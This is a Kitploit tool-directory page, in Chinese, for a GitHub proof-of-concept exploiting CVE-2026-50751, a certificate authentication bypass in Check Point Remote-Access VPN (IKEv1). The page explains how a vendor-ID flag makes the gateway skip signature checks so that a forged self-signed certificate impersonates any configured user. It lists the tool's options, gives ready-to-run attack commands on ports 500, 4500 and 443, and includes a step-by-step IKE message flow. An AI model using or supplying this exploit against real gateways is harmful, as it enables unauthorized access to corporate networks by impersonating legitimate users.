Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-50751 — Check Point Remote-Access VPN 中基于证书的身份验证绕过(IKEv1)。 | Kitploit
工具/GitHubGitHub/ull0a/cve-2026-50751
漏洞利用框架漏洞分析漏洞利用网络安全密码学渗透测试身份验证红队远程访问工具
GitHubull0a/cve-2026-50751

CVE-2026-50751

Check Point Remote-Access VPN 中基于证书的身份验证绕过(IKEv1)。

查看仓库
127小时45分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-50751 — PoC

Check Point Remote-Access VPN(IKEv1)中的证书认证绕过。

描述

CVE-2026-50751 是 Check Point iked 守护进程中的一个认证绕过漏洞,存在于未安装 hotfix sk185033 的 R81.10、R82 和 R82.10 版本中。该缺陷允许在无私钥、无密码且无有效证书的情况下,以任意已配置的 Remote Access 用户身份通过认证。

存在漏洞的 iked 会从 Vendor ID VPNExtFeatures(位 0x4)读取一个标志,若该标志被启用,则跳过 verify_peer_auth / verifyMessagePhase1。其后果是:

不验证证书签名(持有证明)。

不验证信任链。

仅检查 subject DN 是否能解析到已配置的用户。

只需伪造一个自签名证书,使其 CN= 与目标用户匹配,并以无效签名发送即可。如果网关接受第 1 阶段,我们便已以该用户身份通过认证(ISAKMP SA 以其 DN 保存)。

它可作用于 IKE(UDP 500/4500)以及 Visitor Mode(TCPT,TCP 443)。

用法

语法

root@kitploit:~
cve-2026-50751 -host <IP|hostname> -user <username> [opciones]

选项

Flag描述默认值
-host网关的 IP 或 hostname (必填)—
-user要冒充的 RA 用户名 (必填)—
-port端口:500、4500(UDP)或 443(TCPT)500
-orgICA 的组织(O=)。若省略,则从 TLS 证书派生—
-ou用户的组织单位(OU=)users
-timeout每次操作的超时时间6s
-retriesmsg1 的重试次数1
-v详细输出false

示例

通过 UDP/500 的基本攻击

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v

Visitor Mode TCPT/443

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v

强制指定组织而非派生

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v

通过 NAT-T(UDP/4500)

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v

攻击流程

root@kitploit:~
攻击者                                               网关(存在漏洞的 iked)
   │                                                          │
   │─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (位 0x4) ────▶│
   │                                                          │  读取标志 0x4
   │                                                          │  标记 verify_peer_auth = skip
   │◀── msg2: SA 已接受 ──────────────────────────────────────│
   │                                                          │
   │─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
   │◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
   │                                                          │
   │  派生 SKEYID、SKEYID_e、IV                               │
   │                                                          │
   │─── msg5(加密):伪造的 ID=DN + 自签名 CERT             │
   │                    + 随机签名 ──────────────────────────▶│
   │                                                          │  跳过签名
   │                                                          │  验证
   │                                                          │  解析 DN → 用户
   │◀── msg6(加密):SA 已建立 ──────────────────────────────│
   │                                                          │
   │  使用 SKEYID_e 解密 msg6 → 认证证明                     │

下载工具